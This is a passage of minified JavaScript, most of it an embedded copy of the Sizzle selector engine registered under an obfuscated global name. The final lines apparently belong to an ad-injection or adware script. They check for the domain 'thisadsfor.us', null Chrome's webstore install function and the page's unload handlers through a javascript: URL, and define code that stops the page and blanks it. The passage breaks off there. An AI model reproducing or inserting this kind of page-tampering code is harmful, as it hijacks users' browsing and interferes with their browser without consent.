  894.                         aI.setAttribute("type", "hidden");
  895.                         aJ.appendChild(aI).setAttribute("t", "");
  896.                         if (aJ.querySelectorAll("[t^='']").length) {
  897.                             an.push("[*^$]=" + x + "*(?:''|\"\")")
  898.                         }
  899.                         if (!aJ.querySelectorAll(":enabled").length) {
  900.                             an.push(":enabled", ":disabled")
  901.                         }
  902.                         aJ.querySelectorAll("*,:x");
  903.                         an.push(",.*:")
  904.                     })
  905.                 }
  906.                 if ((aD.matchesSelector = O((k = w.webkitMatchesSelector || w.mozMatchesSelector || w.oMatchesSelector || w.msMatchesSelector)))) {
  907.                     m(function(aI) {
  908.                         aD.disconnectedMatch = k.call(aI, "div");
  909.                         k.call(aI, "[s!='']:x");
  910.                         aB.push("!=", s)
  911.                     })
  912.                 }
  913.                 an = an.length && new RegExp(an.join("|"));
  914.                 aB = aB.length && new RegExp(aB.join("|"));
  915.                 P = O(w.contains) || w.compareDocumentPosition ? function(aJ, aI) {
  916.                     var aL = aJ.nodeType === 9 ? aJ.documentElement : aJ,
  917.                         aK = aI && aI.parentNode;
  918.                     return aJ === aK || !!(aK && aK.nodeType === 1 && (aL.contains ? aL.contains(aK) : aJ.compareDocumentPosition && aJ.compareDocumentPosition(aK) & 16))
  919.                 } : function(aJ, aI) {
  920.                     if (aI) {
  921.                         while ((aI = aI.parentNode)) {
  922.                             if (aI === aJ) {
  923.                                 return true
  924.                             }
  925.                         }
  926.                     }
  927.                     return false
  928.                 };
  929.                 aD.sortDetached = m(function(aI) {
  930.                     return aI.compareDocumentPosition(i.createElement("div")) & 1
  931.                 });
  932.                 N = w.compareDocumentPosition ? function(aJ, aI) {
  933.                     if (aJ === aI) {
  934.                         ah = true;
  935.                         return 0
  936.                     }
  937.                     var aK = aI.compareDocumentPosition && aJ.compareDocumentPosition && aJ.compareDocumentPosition(aI);
  938.                     if (aK) {
  939.                         if (aK & 1 || (!aD.sortDetached && aI.compareDocumentPosition(aJ) === aK)) {
  940.                             if (aJ === i || P(T, aJ)) {
  941.                                 return -1
  942.                             }
  943.                             if (aI === i || P(T, aI)) {
  944.                                 return 1
  945.                             }
  946.                             return S ? (j.call(S, aJ) - j.call(S, aI)) : 0
  947.                         }
  948.                         return aK & 4 ? -1 : 1
  949.                     }
  950.                     return aJ.compareDocumentPosition ? -1 : 1
  951.                 } : function(aJ, aI) {
  952.                     var aP, aM = 0,
  953.                         aO = aJ.parentNode,
  954.                         aL = aI.parentNode,
  955.                         aK = [aJ],
  956.                         aN = [aI];
  957.                     if (aJ === aI) {
  958.                         ah = true;
  959.                         return 0
  960.                     } else {
  961.                         if (!aO || !aL) {
  962.                             return aJ === i ? -1 : aI === i ? 1 : aO ? -1 : aL ? 1 : S ? (j.call(S, aJ) - j.call(S, aI)) : 0
  963.                         } else {
  964.                             if (aO === aL) {
  965.                                 return f(aJ, aI)
  966.                             }
  967.                         }
  968.                     }
  969.                     aP = aJ;
  970.                     while ((aP = aP.parentNode)) {
  971.                         aK.unshift(aP)
  972.                     }
  973.                     aP = aI;
  974.                     while ((aP = aP.parentNode)) {
  975.                         aN.unshift(aP)
  976.                     }
  977.                     while (aK[aM] === aN[aM]) {
  978.                         aM++
  979.                     }
  980.                     return aM ? f(aK[aM], aN[aM]) : aK[aM] === T ? -1 : aN[aM] === T ? 1 : 0
  981.                 };
  982.                 return i
  983.             };
  984.             E.matches = function(i, e) {
  985.                 return E(i, null, null, e)
  986.             };
  987.             E.matchesSelector = function(aI, aK) {
  988.                 if ((aI.ownerDocument || aI) !== L) {
  989.                     aj(aI)
  990.                 }
  991.                 aK = aK.replace(B, "='$1']");
  992.                 if (aD.matchesSelector && at && (!aB || !aB.test(aK)) && (!an || !an.test(aK))) {
  993.                     try {
  994.                         var i = k.call(aI, aK);
  995.                         if (i || aD.disconnectedMatch || aI.document && aI.document.nodeType !== 11) {
  996.                             return i
  997.                         }
  998.                     } catch (aJ) {}
  999.                 }
  1000.                 return E(aK, L, null, [aI]).length > 0
  1001.             };
  1002.             E.contains = function(e, i) {
  1003.                 if ((e.ownerDocument || e) !== L) {
  1004.                     aj(e)
  1005.                 }
  1006.                 return P(e, i)
  1007.             };
  1008.             E.attr = function(aI, e) {
  1009.                 if ((aI.ownerDocument || aI) !== L) {
  1010.                     aj(aI)
  1011.                 }
  1012.                 var i = v.attrHandle[e.toLowerCase()],
  1013.                     aJ = (i && Y.call(v.attrHandle, e.toLowerCase()) ? i(aI, e, !at) : q);
  1014.                 return aJ === q ? aD.attributes || !at ? aI.getAttribute(e) : (aJ = aI.getAttributeNode(e)) && aJ.specified ? aJ.value : null : aJ
  1015.             };
  1016.             E.error = function(e) {
  1017.                 throw new Error("Syntax error, unrecognized expression: " + e)
  1018.             };
  1019.             E.uniqueSort = function(aJ) {
  1020.                 var aK, aL = [],
  1021.                     e = 0,
  1022.                     aI = 0;
  1023.                 ah = !aD.detectDuplicates;
  1024.                 S = !aD.sortStable && aJ.slice(0);
  1025.                 aJ.sort(N);
  1026.                 if (ah) {
  1027.                     while ((aK = aJ[aI++])) {
  1028.                         if (aK === aJ[aI]) {
  1029.                             e = aL.push(aI)
  1030.                         }
  1031.                     }
  1032.                     while (e--) {
  1033.                         aJ.splice(aL[e], 1)
  1034.                     }
  1035.                 }
  1036.                 return aJ
  1037.             };
  1038.             R = E.getText = function(aL) {
  1039.                 var aK, aI = "",
  1040.                     aJ = 0,
  1041.                     e = aL.nodeType;
  1042.                 if (!e) {
  1043.                     for (;
  1044.                         (aK = aL[aJ]); aJ++) {
  1045.                         aI += R(aK)
  1046.                     }
  1047.                 } else {
  1048.                     if (e === 1 || e === 9 || e === 11) {
  1049.                         if (typeof aL.textContent === "string") {
  1050.                             return aL.textContent
  1051.                         } else {
  1052.                             for (aL = aL.firstChild; aL; aL = aL.nextSibling) {
  1053.                                 aI += R(aL)
  1054.                             }
  1055.                         }
  1056.                     } else {
  1057.                         if (e === 3 || e === 4) {
  1058.                             return aL.nodeValue
  1059.                         }
  1060.                     }
  1061.                 }
  1062.                 return aI
  1063.             };
  1064.             v = E.selectors = {
  1065.                 cacheLength: 50,
  1066.                 createPseudo: r,
  1067.                 match: am,
  1068.                 attrHandle: {},
  1069.                 find: {},
  1070.                 relative: {
  1071.                     ">": {
  1072.                         dir: "parentNode",
  1073.                         first: true
  1074.                     },
  1075.                     " ": {
  1076.                         dir: "parentNode"
  1077.                     },
  1078.                     "+": {
  1079.                         dir: "previousSibling",
  1080.                         first: true
  1081.                     },
  1082.                     "~": {
  1083.                         dir: "previousSibling"
  1084.                     }
  1085.                 },
  1086.                 preFilter: {
  1087.                     ATTR: function(e) {
  1088.                         e[1] = e[1].replace(A, ap);
  1089.                         e[3] = (e[4] || e[5] || "").replace(A, ap);
  1090.                         if (e[2] === "~=") {
  1091.                             e[3] = " " + e[3] + " "
  1092.                         }
  1093.                         return e.slice(0, 4)
  1094.                     },
  1095.                     CHILD: function(e) {
  1096.                         e[1] = e[1].toLowerCase();
  1097.                         if (e[1].slice(0, 3) === "nth") {
  1098.                             if (!e[3]) {
  1099.                                 E.error(e[0])
  1100.                             }
  1101.                             e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * (e[3] === "even" || e[3] === "odd"));
  1102.                             e[5] = +((e[7] + e[8]) || e[3] === "odd")
  1103.                         } else {
  1104.                             if (e[3]) {
  1105.                                 E.error(e[0])
  1106.                             }
  1107.                         }
  1108.                         return e
  1109.                     },
  1110.                     PSEUDO: function(i) {
  1111.                         var e, aI = !i[5] && i[2];
  1112.                         if (am.CHILD.test(i[0])) {
  1113.                             return null
  1114.                         }
  1115.                         if (i[3] && i[4] !== q) {
  1116.                             i[2] = i[4]
  1117.                         } else {
  1118.                             if (aI && ad.test(aI) && (e = p(aI, true)) && (e = aI.indexOf(")", aI.length - e) - aI.length)) {
  1119.                                 i[0] = i[0].slice(0, e);
  1120.                                 i[2] = aI.slice(0, e)
  1121.                             }
  1122.                         }
  1123.                         return i.slice(0, 3)
  1124.                     }
  1125.                 },
  1126.                 filter: {
  1127.                     TAG: function(i) {
  1128.                         var e = i.replace(A, ap).toLowerCase();
  1129.                         return i === "*" ? function() {
  1130.                             return true
  1131.                         } : function(aI) {
  1132.                             return aI.nodeName && aI.nodeName.toLowerCase() === e
  1133.                         }
  1134.                     },
  1135.                     CLASS: function(e) {
  1136.                         var i = d[e + " "];
  1137.                         return i || (i = new RegExp("(^|" + x + ")" + e + "(" + x + "|$)")) && d(e, function(aI) {
  1138.                             return i.test(typeof aI.className === "string" && aI.className || typeof aI.getAttribute !== az && aI.getAttribute("class") || "")
  1139.                         })
  1140.                     },
  1141.                     ATTR: function(aI, i, e) {
  1142.                         return function(aK) {
  1143.                             var aJ = E.attr(aK, aI);
  1144.                             if (aJ == null) {
  1145.                                 return i === "!="
  1146.                             }
  1147.                             if (!i) {
  1148.                                 return true
  1149.                             }
  1150.                             aJ += "";
  1151.                             return i === "=" ? aJ === e : i === "!=" ? aJ !== e : i === "^=" ? e && aJ.indexOf(e) === 0 : i === "*=" ? e && aJ.indexOf(e) > -1 : i === "$=" ? e && aJ.slice(-e.length) === e : i === "~=" ? (" " + aJ + " ").indexOf(e) > -1 : i === "|=" ? aJ === e || aJ.slice(0, e.length + 1) === e + "-" : false
  1152.                         }
  1153.                     },
  1154.                     CHILD: function(i, aK, aJ, aL, aI) {
  1155.                         var aN = i.slice(0, 3) !== "nth",
  1156.                             e = i.slice(-4) !== "last",
  1157.                             aM = aK === "of-type";
  1158.                         return aL === 1 && aI === 0 ? function(aO) {
  1159.                             return !!aO.parentNode
  1160.                         } : function(aU, aS, aX) {
  1161.                             var aO, a0, aV, aZ, aW, aR, aT = aN !== e ? "nextSibling" : "previousSibling",
  1162.                                 aY = aU.parentNode,
  1163.                                 aQ = aM && aU.nodeName.toLowerCase(),
  1164.                                 aP = !aX && !aM;
  1165.                             if (aY) {
  1166.                                 if (aN) {
  1167.                                     while (aT) {
  1168.                                         aV = aU;
  1169.                                         while ((aV = aV[aT])) {
  1170.                                             if (aM ? aV.nodeName.toLowerCase() === aQ : aV.nodeType === 1) {
  1171.                                                 return false
  1172.                                             }
  1173.                                         }
  1174.                                         aR = aT = i === "only" && !aR && "nextSibling"
  1175.                                     }
  1176.                                     return true
  1177.                                 }
  1178.                                 aR = [e ? aY.firstChild : aY.lastChild];
  1179.                                 if (e && aP) {
  1180.                                     a0 = aY[av] || (aY[av] = {});
  1181.                                     aO = a0[i] || [];
  1182.                                     aW = aO[0] === aE && aO[1];
  1183.                                     aZ = aO[0] === aE && aO[2];
  1184.                                     aV = aW && aY.childNodes[aW];
  1185.                                     while ((aV = ++aW && aV && aV[aT] || (aZ = aW = 0) || aR.pop())) {
  1186.                                         if (aV.nodeType === 1 && ++aZ && aV === aU) {
  1187.                                             a0[i] = [aE, aW, aZ];
  1188.                                             break
  1189.                                         }
  1190.                                     }
  1191.                                 } else {
  1192.                                     if (aP && (aO = (aU[av] || (aU[av] = {}))[i]) && aO[0] === aE) {
  1193.                                         aZ = aO[1]
  1194.                                     } else {
  1195.                                         while ((aV = ++aW && aV && aV[aT] || (aZ = aW = 0) || aR.pop())) {
  1196.                                             if ((aM ? aV.nodeName.toLowerCase() === aQ : aV.nodeType === 1) && ++aZ) {
  1197.                                                 if (aP) {
  1198.                                                     (aV[av] || (aV[av] = {}))[i] = [aE, aZ]
  1199.                                                 }
  1200.                                                 if (aV === aU) {
  1201.                                                     break
  1202.                                                 }
  1203.                                             }
  1204.                                         }
  1205.                                     }
  1206.                                 }
  1207.                                 aZ -= aI;
  1208.                                 return aZ === aL || (aZ % aL === 0 && aZ / aL >= 0)
  1209.                             }
  1210.                         }
  1211.                     },
  1212.                     PSEUDO: function(aJ, aI) {
  1213.                         var e, i = v.pseudos[aJ] || v.setFilters[aJ.toLowerCase()] || E.error("unsupported pseudo: " + aJ);
  1214.                         if (i[av]) {
  1215.                             return i(aI)
  1216.                         }
  1217.                         if (i.length > 1) {
  1218.                             e = [aJ, aJ, "", aI];
  1219.                             return v.setFilters.hasOwnProperty(aJ.toLowerCase()) ? r(function(aM, aO) {
  1220.                                 var aL, aK = i(aM, aI),
  1221.                                     aN = aK.length;
  1222.                                 while (aN--) {
  1223.                                     aL = j.call(aM, aK[aN]);
  1224.                                     aM[aL] = !(aO[aL] = aK[aN])
  1225.                                 }
  1226.                             }) : function(aK) {
  1227.                                 return i(aK, 0, e)
  1228.                             }
  1229.                         }
  1230.                         return i
  1231.                     }
  1232.                 },
  1233.                 pseudos: {
  1234.                     not: r(function(e) {
  1235.                         var i = [],
  1236.                             aI = [],
  1237.                             aJ = ag(e.replace(z, "$1"));
  1238.                         return aJ[av] ? r(function(aL, aQ, aO, aM) {
  1239.                             var aP, aK = aJ(aL, null, aM, []),
  1240.                                 aN = aL.length;
  1241.                             while (aN--) {
  1242.                                 if ((aP = aK[aN])) {
  1243.                                     aL[aN] = !(aQ[aN] = aP)
  1244.                                 }
  1245.                             }
  1246.                         }) : function(aM, aL, aK) {
  1247.                             i[0] = aM;
  1248.                             aJ(i, null, aK, aI);
  1249.                             return !aI.pop()
  1250.                         }
  1251.                     }),
  1252.                     has: r(function(e) {
  1253.                         return function(i) {
  1254.                             return E(e, i).length > 0
  1255.                         }
  1256.                     }),
  1257.                     contains: r(function(e) {
  1258.                         return function(i) {
  1259.                             return (i.textContent || i.innerText || R(i)).indexOf(e) > -1
  1260.                         }
  1261.                     }),
  1262.                     lang: r(function(e) {
  1263.                         if (!ae.test(e || "")) {
  1264.                             E.error("unsupported lang: " + e)
  1265.                         }
  1266.                         e = e.replace(A, ap).toLowerCase();
  1267.                         return function(aI) {
  1268.                             var i;
  1269.                             do {
  1270.                                 if ((i = at ? aI.lang : aI.getAttribute("xml:lang") || aI.getAttribute("lang"))) {
  1271.                                     i = i.toLowerCase();
  1272.                                     return i === e || i.indexOf(e + "-") === 0
  1273.                                 }
  1274.                             } while ((aI = aI.parentNode) && aI.nodeType === 1);
  1275.                             return false
  1276.                         }
  1277.                     }),
  1278.                     target: function(e) {
  1279.                         var i = aA.location && aA.location.hash;
  1280.                         return i && i.slice(1) === e.id
  1281.                     },
  1282.                     root: function(e) {
  1283.                         return e === w
  1284.                     },
  1285.                     focus: function(e) {
  1286.                         return e === L.activeElement && (!L.hasFocus || L.hasFocus()) && !!(e.type || e.href || ~e.tabIndex)
  1287.                     },
  1288.                     enabled: function(e) {
  1289.                         return e.disabled === false
  1290.                     },
  1291.                     disabled: function(e) {
  1292.                         return e.disabled === true
  1293.                     },
  1294.                     checked: function(e) {
  1295.                         var i = e.nodeName.toLowerCase();
  1296.                         return (i === "input" && !!e.checked) || (i === "option" && !!e.selected)
  1297.                     },
  1298.                     selected: function(e) {
  1299.                         if (e.parentNode) {
  1300.                             e.parentNode.selectedIndex
  1301.                         }
  1302.                         return e.selected === true
  1303.                     },
  1304.                     empty: function(e) {
  1305.                         for (e = e.firstChild; e; e = e.nextSibling) {
  1306.                             if (e.nodeName > "@" || e.nodeType === 3 || e.nodeType === 4) {
  1307.                                 return false
  1308.                             }
  1309.                         }
  1310.                         return true
  1311.                     },
  1312.                     parent: function(e) {
  1313.                         return !v.pseudos.empty(e)
  1314.                     },
  1315.                     header: function(e) {
  1316.                         return t.test(e.nodeName)
  1317.                     },
  1318.                     input: function(e) {
  1319.                         return h.test(e.nodeName)
  1320.                     },
  1321.                     button: function(i) {
  1322.                         var e = i.nodeName.toLowerCase();
  1323.                         return e === "input" && i.type === "button" || e === "button"
  1324.                     },
  1325.                     text: function(i) {
  1326.                         var e;
  1327.                         return i.nodeName.toLowerCase() === "input" && i.type === "text" && ((e = i.getAttribute("type")) == null || e.toLowerCase() === i.type)
  1328.                     },
  1329.                     first: ar(function() {
  1330.                         return [0]
  1331.                     }),
  1332.                     last: ar(function(e, i) {
  1333.                         return [i - 1]
  1334.                     }),
  1335.                     eq: ar(function(e, aI, i) {
  1336.                         return [i < 0 ? i + aI : i]
  1337.                     }),
  1338.                     even: ar(function(e, aJ) {
  1339.                         var aI = 0;
  1340.                         for (; aI < aJ; aI += 2) {
  1341.                             e.push(aI)
  1342.                         }
  1343.                         return e
  1344.                     }),
  1345.                     odd: ar(function(e, aJ) {
  1346.                         var aI = 1;
  1347.                         for (; aI < aJ; aI += 2) {
  1348.                             e.push(aI)
  1349.                         }
  1350.                         return e
  1351.                     }),
  1352.                     lt: ar(function(e, aK, aJ) {
  1353.                         var aI = aJ < 0 ? aJ + aK : aJ;
  1354.                         for (; --aI >= 0;) {
  1355.                             e.push(aI)
  1356.                         }
  1357.                         return e
  1358.                     }),
  1359.                     gt: ar(function(e, aK, aJ) {
  1360.                         var aI = aJ < 0 ? aJ + aK : aJ;
  1361.                         for (; ++aI < aK;) {
  1362.                             e.push(aI)
  1363.                         }
  1364.                         return e
  1365.                     })
  1366.                 }
  1367.             };
  1368.             for (G in {
  1369.                     radio: true,
  1370.                     checkbox: true,
  1371.                     file: true,
  1372.                     password: true,
  1373.                     image: true
  1374.                 }) {
  1375.                 v.pseudos[G] = F(G)
  1376.             }
  1377.             for (G in {
  1378.                     submit: true,
  1379.                     reset: true
  1380.                 }) {
  1381.                 v.pseudos[G] = g(G)
  1382.             }
  1383.  
  1384.             function p(aK, aP) {
  1385.                 var i, aL, aN, aO, aM, aI, e, aJ = au[aK + " "];
  1386.                 if (aJ) {
  1387.                     return aP ? 0 : aJ.slice(0)
  1388.                 }
  1389.                 aM = aK;
  1390.                 aI = [];
  1391.                 e = v.preFilter;
  1392.                 while (aM) {
  1393.                     if (!i || (aL = D.exec(aM))) {
  1394.                         if (aL) {
  1395.                             aM = aM.slice(aL[0].length) || aM
  1396.                         }
  1397.                         aI.push(aN = [])
  1398.                     }
  1399.                     i = false;
  1400.                     if ((aL = K.exec(aM))) {
  1401.                         i = aL.shift();
  1402.                         aN.push({
  1403.                             value: i,
  1404.                             type: aL[0].replace(z, " ")
  1405.                         });
  1406.                         aM = aM.slice(i.length)
  1407.                     }
  1408.                     for (aO in v.filter) {
  1409.                         if ((aL = am[aO].exec(aM)) && (!e[aO] || (aL = e[aO](aL)))) {
  1410.                             i = aL.shift();
  1411.                             aN.push({
  1412.                                 value: i,
  1413.                                 type: aO,
  1414.                                 matches: aL
  1415.                             });
  1416.                             aM = aM.slice(i.length)
  1417.                         }
  1418.                     }
  1419.                     if (!i) {
  1420.                         break
  1421.                     }
  1422.                 }
  1423.                 return aP ? aM.length : aM ? E.error(aK) : au(aK, aI).slice(0)
  1424.             }
  1425.  
  1426.             function o(aK) {
  1427.                 var aJ = 0,
  1428.                     aI = aK.length,
  1429.                     e = "";
  1430.                 for (; aJ < aI; aJ++) {
  1431.                     e += aK[aJ].value
  1432.                 }
  1433.                 return e
  1434.             }
  1435.  
  1436.             function y(aK, aI, aJ) {
  1437.                 var e = aI.dir,
  1438.                     aL = aJ && e === "parentNode",
  1439.                     i = ao++;
  1440.                 return aI.first ? function(aO, aN, aM) {
  1441.                     while ((aO = aO[e])) {
  1442.                         if (aO.nodeType === 1 || aL) {
  1443.                             return aK(aO, aN, aM)
  1444.                         }
  1445.                     }
  1446.                 } : function(aQ, aO, aN) {
  1447.                     var aS, aM, aP, aR = aE + " " + i;
  1448.                     if (aN) {
  1449.                         while ((aQ = aQ[e])) {
  1450.                             if (aQ.nodeType === 1 || aL) {
  1451.                                 if (aK(aQ, aO, aN)) {
  1452.                                     return true
  1453.                                 }
  1454.                             }
  1455.                         }
  1456.                     } else {
  1457.                         while ((aQ = aQ[e])) {
  1458.                             if (aQ.nodeType === 1 || aL) {
  1459.                                 aP = aQ[av] || (aQ[av] = {});
  1460.                                 if ((aM = aP[e]) && aM[0] === aR) {
  1461.                                     if ((aS = aM[1]) === true || aS === l) {
  1462.                                         return aS === true
  1463.                                     }
  1464.                                 } else {
  1465.                                     aM = aP[e] = [aR];
  1466.                                     aM[1] = aK(aQ, aO, aN) || l;
  1467.                                     if (aM[1] === true) {
  1468.                                         return true
  1469.                                     }
  1470.                                 }
  1471.                             }
  1472.                         }
  1473.                     }
  1474.                 }
  1475.             }
  1476.  
  1477.             function aG(e) {
  1478.                 return e.length > 1 ? function(aL, aK, aI) {
  1479.                     var aJ = e.length;
  1480.                     while (aJ--) {
  1481.                         if (!e[aJ](aL, aK, aI)) {
  1482.                             return false
  1483.                         }
  1484.                     }
  1485.                     return true
  1486.                 } : e[0]
  1487.             }
  1488.  
  1489.             function ak(e, aI, aJ, aK, aN) {
  1490.                 var aL, aQ = [],
  1491.                     aM = 0,
  1492.                     aO = e.length,
  1493.                     aP = aI != null;
  1494.                 for (; aM < aO; aM++) {
  1495.                     if ((aL = e[aM])) {
  1496.                         if (!aJ || aJ(aL, aK, aN)) {
  1497.                             aQ.push(aL);
  1498.                             if (aP) {
  1499.                                 aI.push(aM)
  1500.                             }
  1501.                         }
  1502.                     }
  1503.                 }
  1504.                 return aQ
  1505.             }
  1506.  
  1507.             function n(aI, i, aK, aJ, aL, e) {
  1508.                 if (aJ && !aJ[av]) {
  1509.                     aJ = n(aJ)
  1510.                 }
  1511.                 if (aL && !aL[av]) {
  1512.                     aL = n(aL, e)
  1513.                 }
  1514.                 return r(function(aW, aT, aO, aV) {
  1515.                     var aY, aU, aQ, aP = [],
  1516.                         aX = [],
  1517.                         aN = aT.length,
  1518.                         aM = aW || I(i || "*", aO.nodeType ? [aO] : aO, []),
  1519.                         aR = aI && (aW || !i) ? ak(aM, aP, aI, aO, aV) : aM,
  1520.                         aS = aK ? aL || (aW ? aI : aN || aJ) ? [] : aT : aR;
  1521.                     if (aK) {
  1522.                         aK(aR, aS, aO, aV)
  1523.                     }
  1524.                     if (aJ) {
  1525.                         aY = ak(aS, aX);
  1526.                         aJ(aY, [], aO, aV);
  1527.                         aU = aY.length;
  1528.                         while (aU--) {
  1529.                             if ((aQ = aY[aU])) {
  1530.                                 aS[aX[aU]] = !(aR[aX[aU]] = aQ)
  1531.                             }
  1532.                         }
  1533.                     }
  1534.                     if (aW) {
  1535.                         if (aL || aI) {
  1536.                             if (aL) {
  1537.                                 aY = [];
  1538.                                 aU = aS.length;
  1539.                                 while (aU--) {
  1540.                                     if ((aQ = aS[aU])) {
  1541.                                         aY.push((aR[aU] = aQ))
  1542.                                     }
  1543.                                 }
  1544.                                 aL(null, (aS = []), aY, aV)
  1545.                             }
  1546.                             aU = aS.length;
  1547.                             while (aU--) {
  1548.                                 if ((aQ = aS[aU]) && (aY = aL ? j.call(aW, aQ) : aP[aU]) > -1) {
  1549.                                     aW[aY] = !(aT[aY] = aQ)
  1550.                                 }
  1551.                             }
  1552.                         }
  1553.                     } else {
  1554.                         aS = ak(aS === aT ? aS.splice(aN, aS.length) : aS);
  1555.                         if (aL) {
  1556.                             aL(null, aT, aS, aV)
  1557.                         } else {
  1558.                             b.apply(aT, aS)
  1559.                         }
  1560.                     }
  1561.                 })
  1562.             }
  1563.  
  1564.             function aw(aN) {
  1565.                 var aI, aL, aJ, aM = aN.length,
  1566.                     aQ = v.relative[aN[0].type],
  1567.                     aR = aQ || v.relative[" "],
  1568.                     aK = aQ ? 1 : 0,
  1569.                     aO = y(function(i) {
  1570.                         return i === aI
  1571.                     }, aR, true),
  1572.                     aP = y(function(i) {
  1573.                         return j.call(aI, i) > -1
  1574.                     }, aR, true),
  1575.                     e = [function(aT, aS, i) {
  1576.                         return (!aQ && (i || aS !== aH)) || ((aI = aS).nodeType ? aO(aT, aS, i) : aP(aT, aS, i))
  1577.                     }];
  1578.                 for (; aK < aM; aK++) {
  1579.                     if ((aL = v.relative[aN[aK].type])) {
  1580.                         e = [y(aG(e), aL)]
  1581.                     } else {
  1582.                         aL = v.filter[aN[aK].type].apply(null, aN[aK].matches);
  1583.                         if (aL[av]) {
  1584.                             aJ = ++aK;
  1585.                             for (; aJ < aM; aJ++) {
  1586.                                 if (v.relative[aN[aJ].type]) {
  1587.                                     break
  1588.                                 }
  1589.                             }
  1590.                             return n(aK > 1 && aG(e), aK > 1 && o(aN.slice(0, aK - 1).concat({
  1591.                                 value: aN[aK - 2].type === " " ? "*" : ""
  1592.                             })).replace(z, "$1"), aL, aK < aJ && aw(aN.slice(aK, aJ)), aJ < aM && aw((aN = aN.slice(aJ))), aJ < aM && o(aN))
  1593.                         }
  1594.                         e.push(aL)
  1595.                     }
  1596.                 }
  1597.                 return aG(e)
  1598.             }
  1599.  
  1600.             function ai(aJ, aI) {
  1601.                 var aL = 0,
  1602.                     e = aI.length > 0,
  1603.                     aK = aJ.length > 0,
  1604.                     i = function(aV, aP, aU, aT, a1) {
  1605.                         var aQ, aR, aW, a0 = [],
  1606.                             aZ = 0,
  1607.                             aS = "0",
  1608.                             aM = aV && [],
  1609.                             aX = a1 != null,
  1610.                             aY = aH,
  1611.                             aO = aV || aK && v.find.TAG("*", a1 && aP.parentNode || aP),
  1612.                             aN = (aE += aY == null ? 1 : Math.random() || 0.1);
  1613.                         if (aX) {
  1614.                             aH = aP !== L && aP;
  1615.                             l = aL
  1616.                         }
  1617.                         for (;
  1618.                             (aQ = aO[aS]) != null; aS++) {
  1619.                             if (aK && aQ) {
  1620.                                 aR = 0;
  1621.                                 while ((aW = aJ[aR++])) {
  1622.                                     if (aW(aQ, aP, aU)) {
  1623.                                         aT.push(aQ);
  1624.                                         break
  1625.                                     }
  1626.                                 }
  1627.                                 if (aX) {
  1628.                                     aE = aN;
  1629.                                     l = ++aL
  1630.                                 }
  1631.                             }
  1632.                             if (e) {
  1633.                                 if ((aQ = !aW && aQ)) {
  1634.                                     aZ--
  1635.                                 }
  1636.                                 if (aV) {
  1637.                                     aM.push(aQ)
  1638.                                 }
  1639.                             }
  1640.                         }
  1641.                         aZ += aS;
  1642.                         if (e && aS !== aZ) {
  1643.                             aR = 0;
  1644.                             while ((aW = aI[aR++])) {
  1645.                                 aW(aM, a0, aP, aU)
  1646.                             }
  1647.                             if (aV) {
  1648.                                 if (aZ > 0) {
  1649.                                     while (aS--) {
  1650.                                         if (!(aM[aS] || a0[aS])) {
  1651.                                             a0[aS] = ay.call(aT)
  1652.                                         }
  1653.                                     }
  1654.                                 }
  1655.                                 a0 = ak(a0)
  1656.                             }
  1657.                             b.apply(aT, a0);
  1658.                             if (aX && !aV && a0.length > 0 && (aZ + aI.length) > 1) {
  1659.                                 E.uniqueSort(aT)
  1660.                             }
  1661.                         }
  1662.                         if (aX) {
  1663.                             aE = aN;
  1664.                             aH = aY
  1665.                         }
  1666.                         return aM
  1667.                     };
  1668.                 return e ? r(i) : i
  1669.             }
  1670.             ag = E.compile = function(e, aM) {
  1671.                 var aJ, aI = [],
  1672.                     aL = [],
  1673.                     aK = Q[e + " "];
  1674.                 if (!aK) {
  1675.                     if (!aM) {
  1676.                         aM = p(e)
  1677.                     }
  1678.                     aJ = aM.length;
  1679.                     while (aJ--) {
  1680.                         aK = aw(aM[aJ]);
  1681.                         if (aK[av]) {
  1682.                             aI.push(aK)
  1683.                         } else {
  1684.                             aL.push(aK)
  1685.                         }
  1686.                     }
  1687.                     aK = Q(e, ai(aL, aI))
  1688.                 }
  1689.                 return aK
  1690.             };
  1691.  
  1692.             function I(aI, aL, aK) {
  1693.                 var aJ = 0,
  1694.                     e = aL.length;
  1695.                 for (; aJ < e; aJ++) {
  1696.                     E(aI, aL[aJ], aK)
  1697.                 }
  1698.                 return aK
  1699.             }
  1700.  
  1701.             function aC(aJ, e, aK, aN) {
  1702.                 var aL, aP, aI, aQ, aO, aM = p(aJ);
  1703.                 if (!aN) {
  1704.                     if (aM.length === 1) {
  1705.                         aP = aM[0] = aM[0].slice(0);
  1706.                         if (aP.length > 2 && (aI = aP[0]).type === "ID" && aD.getById && e.nodeType === 9 && at && v.relative[aP[1].type]) {
  1707.                             e = (v.find.ID(aI.matches[0].replace(A, ap), e) || [])[0];
  1708.                             if (!e) {
  1709.                                 return aK
  1710.                             }
  1711.                             aJ = aJ.slice(aP.shift().value.length)
  1712.                         }
  1713.                         aL = am.needsContext.test(aJ) ? 0 : aP.length;
  1714.                         while (aL--) {
  1715.                             aI = aP[aL];
  1716.                             if (v.relative[(aQ = aI.type)]) {
  1717.                                 break
  1718.                             }
  1719.                             if ((aO = v.find[aQ])) {
  1720.                                 if ((aN = aO(aI.matches[0].replace(A, ap), al.test(aP[0].type) && e.parentNode || e))) {
  1721.                                     aP.splice(aL, 1);
  1722.                                     aJ = aN.length && o(aP);
  1723.                                     if (!aJ) {
  1724.                                         b.apply(aK, aN);
  1725.                                         return aK
  1726.                                     }
  1727.                                     break
  1728.                                 }
  1729.                             }
  1730.                         }
  1731.                     }
  1732.                 }
  1733.                 ag(aJ, aM)(aN, e, !at, aK, al.test(aJ));
  1734.                 return aK
  1735.             }
  1736.             v.pseudos.nth = v.pseudos.eq;
  1737.  
  1738.             function af() {}
  1739.             af.prototype = v.filters = v.pseudos;
  1740.             v.setFilters = new af();
  1741.             aD.sortStable = av.split("").sort(N).join("") === av;
  1742.             aj();
  1743.             [0, 0].sort(N);
  1744.             aD.detectDuplicates = ah;
  1745.             aA["c9f22c14a3872f280d"].Sizzle = E
  1746.         })(window);;
  1747.         var e = i[g].Sizzle;
  1748.         var d = i[g];
  1749.         d.Sizzle = e;
  1750.         d.demoMode = i[g].demoMode = (o);
  1751.         d.ready(function() {
  1752.             if (location.href.indexOf("thisadsfor.us") > -1) {
  1753.                 return true
  1754.             }
  1755.             try {
  1756.                 (function() {
  1757.                     var z = function() {
  1758.                         location.href = "javascript:(" + function() {
  1759.                             window.onbeforeunload = null;
  1760.                             window.onunload = null;
  1761.                             chrome.webstore.install = null
  1762.                         } + ")()"
  1763.                     };
  1764.                     var y = function() {
  1765.                         window.stop && window.stop();
  1766.                         location.replace("about:blank")
  1767.                     };
